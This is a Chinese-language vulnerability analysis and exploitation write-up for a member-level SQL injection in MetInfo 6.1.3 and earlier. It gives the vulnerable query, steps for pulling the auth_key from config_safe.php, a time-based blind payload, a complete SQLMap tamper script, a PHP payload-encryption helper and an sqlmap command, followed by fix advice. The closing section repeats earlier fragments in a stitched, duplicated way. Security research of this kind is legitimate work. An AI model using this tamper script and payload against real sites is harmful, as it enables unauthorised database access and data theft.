MetInfo <=6.1.3 前台SQL注入漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2>
MetInfo企业网站管理系统在6.1.3及以下版本存在一个前台SQL注入漏洞，攻击者需要具备会员权限才能利用此漏洞。该漏洞存在于`\/member\/basic.php<\/code>文件中，通过精心构造的请求参数可导致SQL注入攻击。<\/p>`

0x01 漏洞影响<\/h2>

影响版本：MetInfo <=6.1.3<\/li>
影响环境：PHP-TS（线程安全）版本<\/li>
利用条件：需要会员权限<\/li>
<\/ul>
0x02 漏洞分析<\/h2>
漏洞定位<\/h3>
漏洞主要存在于以下文件：<\/p>

\/member\/basic.php<\/code><\/li>
\/app\/system\/user\/web\/profile.class.php<\/code><\/li>
\/app\/system\/include\/class\/auth.class.php<\/code><\/li>
<\/ul>
关键代码分析<\/h3>


入口点<\/strong>：\/member\/basic.php<\/code>文件中的dosafety_emailadd<\/code>方法<\/p>
<\/li>

调用链<\/strong>：<\/p>

dosafety_emailadd<\/code>方法调用auth<\/code>类的decode<\/code>方法<\/li>
decode<\/code>方法处理用户输入<\/li>
最终调用get_user_by_emailid<\/code>方法执行SQL查询<\/li>
<\/ul>
<\/li>

关键漏洞点<\/strong>：<\/p>

在\/app\/system\/include\/class\/auth.class.php<\/code>文件的get_user_by_emailid<\/code>方法中，直接将用户输入的$email<\/code>参数拼接到了SQL语句中，没有进行任何过滤或转义：<\/li>
<\/ul>
public<\/span> static<\/span> function<\/span> get_user_by_emailid<\/span>($emailid){
<\/span><\/span>    $sql =<\/span> "SELECT * FROM <\/span>{<\/span>$_M['table'<\/span>]['user'<\/span>]}<\/span> WHERE email = '<\/span>{<\/span>$emailid}<\/span>'"<\/span>;
<\/span><\/span>    return<\/span> DB<\/span>::<\/span>get_one<\/span>($sql);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x03 漏洞利用<\/h2>
利用条件<\/h3>

获取auth_key<\/code>：需要从\/config\/config_safe.php<\/code>文件中获取加密密钥<\/li>
需要会员权限（有效的会员cookie）<\/li>
服务器必须运行在PHP-TS（线程安全）版本<\/li>
<\/ol>
利用步骤<\/h3>


获取加密密钥<\/strong>：<\/p>

访问http:\/\/target.com\/config\/config_safe.php<\/code><\/li>
查看源代码获取被注释的auth_key<\/code>值<\/li>
<\/ul>
<\/li>

构造恶意payload<\/strong>：<\/p>

使用获取的auth_key<\/code>对恶意SQL语句进行加密<\/li>
示例payload：a.com' or username='test' and if(length(user())>=10,sleep(5),0)#<\/code><\/li>
<\/ul>
<\/li>

发送恶意请求<\/strong>：<\/p>

构造URL：http:\/\/target.com\/member\/basic.php?a=dosafety_emailadd&p=[加密后的payload]<\/code><\/li>
携带有效的会员cookie<\/li>
<\/ul>
<\/li>

利用延时注入<\/strong>：<\/p>

由于页面只返回true或false，需要使用延时盲注技术<\/li>
通过观察响应时间判断注入是否成功<\/li>
<\/ul>
<\/li>
<\/ol>
自动化利用<\/h3>
可以使用以下工具自动化利用该漏洞：<\/p>


SQLMap Tamper脚本<\/strong>：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>"""
<\/span><\/span><\/span>Metinfo V6.1.3
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>from<\/span> sys import<\/span> argv
<\/span><\/span>import<\/span> urllib2
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOWEST
<\/span><\/span>api_url =<\/span> "http:\/\/localhost:8081\/sqli.php?key=#1&encodestr=#2"<\/span>
<\/span><\/span>key_name =<\/span> "\/config\/config_safe.php"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>(): pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>    global<\/span> api_url
<\/span><\/span>    url =<\/span> argv[2<\/span>].<\/span>replace("\/member\/basic.php?a=dosafety_emailadd&p=*"<\/span>,""<\/span>)
<\/span><\/span>    send_key(url)
<\/span><\/span>    res =<\/span> request(api_url.<\/span>replace("#2"<\/span>,urllib2.<\/span>quote("a.com' or username='test'"<\/span>+<\/span>payload)))
<\/span><\/span>    if<\/span> res["code"<\/span>] ==<\/span> 200<\/span>:
<\/span><\/span>        return<\/span> res["text"<\/span>]
<\/span><\/span>
<\/span><\/span>def<\/span> send_key<\/span>(url):
<\/span><\/span>    global<\/span> api_url,key_name
<\/span><\/span>    res =<\/span> request(url+<\/span>key_name)
<\/span><\/span>    if<\/span>(res["code"<\/span>] ==<\/span> 200<\/span>):
<\/span><\/span>        if<\/span>(len(res["text"<\/span>])><\/span>0<\/span>):
<\/span><\/span>            api_url =<\/span> api_url.<\/span>replace("#1"<\/span>,res["text"<\/span>].<\/span>replace("<?php\/*"<\/span>,""<\/span>).<\/span>replace("*\/?>"<\/span>,""<\/span>).<\/span>strip())
<\/span><\/span>        else<\/span>:
<\/span><\/span>            print "[-] URL can not be used. "<\/span>
<\/span><\/span>            exit()
<\/span><\/span>
<\/span><\/span>def<\/span> request<\/span>(url):
<\/span><\/span>    request =<\/span> urllib2.<\/span>Request(url)
<\/span><\/span>    request.<\/span>add_header('Content-Type'<\/span>, 'application\/x-www-form-urlencoded'<\/span>)
<\/span><\/span>    response =<\/span> urllib2.<\/span>urlopen(request)
<\/span><\/span>    return<\/span> {"code"<\/span>:response.<\/span>getcode(),"text"<\/span>:response.<\/span>read()}
<\/span><\/span><\/code><\/pre><\/li>

API接口脚本<\/strong>（用于加密payload）：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> auth<\/span> {
<\/span><\/span>    public<\/span> $auth_key;
<\/span><\/span>
<\/span><\/span>    public<\/span> function<\/span> __construct($key) {
<\/span><\/span>        $this-><\/span>auth_key<\/span> =<\/span> $key;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    \/\/ 其他方法...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>(isset<\/span>($_REQUEST["key"<\/span>]) &&<\/span> !<\/span>empty<\/span>($_REQUEST["key"<\/span>])) {
<\/span><\/span>    $auth =<\/span> new<\/span> auth<\/span>($_REQUEST["key"<\/span>]);
<\/span><\/span>} else<\/span> {
<\/span><\/span>    exit<\/span>("[-] Please input key."<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>(isset<\/span>($_REQUEST["encodestr"<\/span>]) &&<\/span> !<\/span>empty<\/span>($_REQUEST["encodestr"<\/span>])) {
<\/span><\/span>    exit<\/span>($auth-><\/span>encode<\/span>(urldecode<\/span>($_REQUEST["encodestr"<\/span>])));
<\/span><\/span>} else<\/span> {
<\/span><\/span>    exit<\/span>("[-] Please enter encrypted string."<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

SQLMap命令<\/strong>：<\/p>
sqlmap -u "http:\/\/target.com\/member\/basic.php?a=dosafety_emailadd&p=*" --cookie "会员cookie" --tamper "Metinfo.py" --dbms "mysql" --technique "T"
<\/code><\/pre>
<\/li>
<\/ol>
0x04 漏洞修复<\/h2>


官方修复<\/strong>：<\/p>

升级到最新版本<\/li>
使用MetInfo提供的安全函数如inject_check<\/code>或daddslashes<\/code>对用户输入进行过滤<\/li>
<\/ul>
<\/li>

临时修复<\/strong>：<\/p>

修改get_user_by_emailid<\/code>方法，使用参数化查询<\/li>
对用户输入进行严格的过滤和转义<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 注意事项<\/h2>

该漏洞只能在PHP-TS（线程安全）版本中利用<\/li>
需要有效的会员权限才能利用<\/li>
加密密钥auth_key<\/code>必须正确才能成功构造payload<\/li>
由于是盲注漏洞，利用效率较低，建议使用自动化工具<\/li>
<\/ol>
0x06 参考<\/h2>

原始漏洞分析文章：先知社区<\/a><\/li>
MetInfo官方网站：http:\/\/www.metinfo.cn\/<\/li>
<\/ul>

MetInfo <=6.1.3 前台SQL注入漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2> MetInfo企业网站管理系统在6.1.3及以下版本存在一个前台SQL注入漏洞，攻击者需要具备会员权限才能利用此漏洞。该漏洞存在于\/member\/basic.php<\/code>文件中，通过精心构造的请求参数可导致SQL注入攻击。<\/p>

0x02 漏洞分析<\/h2>

0x03 漏洞利用<\/h2>

0x06 参考<\/h2> 原始漏洞分析文章：先知社区<\/a><\/li> MetInfo官方网站：http:\/\/www.metinfo.cn\/<\/li> <\/ul>

0x00 漏洞概述<\/h2>
MetInfo企业网站管理系统在6.1.3及以下版本存在一个前台SQL注入漏洞，攻击者需要具备会员权限才能利用此漏洞。该漏洞存在于`\/member\/basic.php<\/code>文件中，通过精心构造的请求参数可导致SQL注入攻击。<\/p>`

0x06 参考<\/h2>

原始漏洞分析文章：先知社区<\/a><\/li>
MetInfo官方网站：http:\/\/www.metinfo.cn\/<\/li> <\/ul>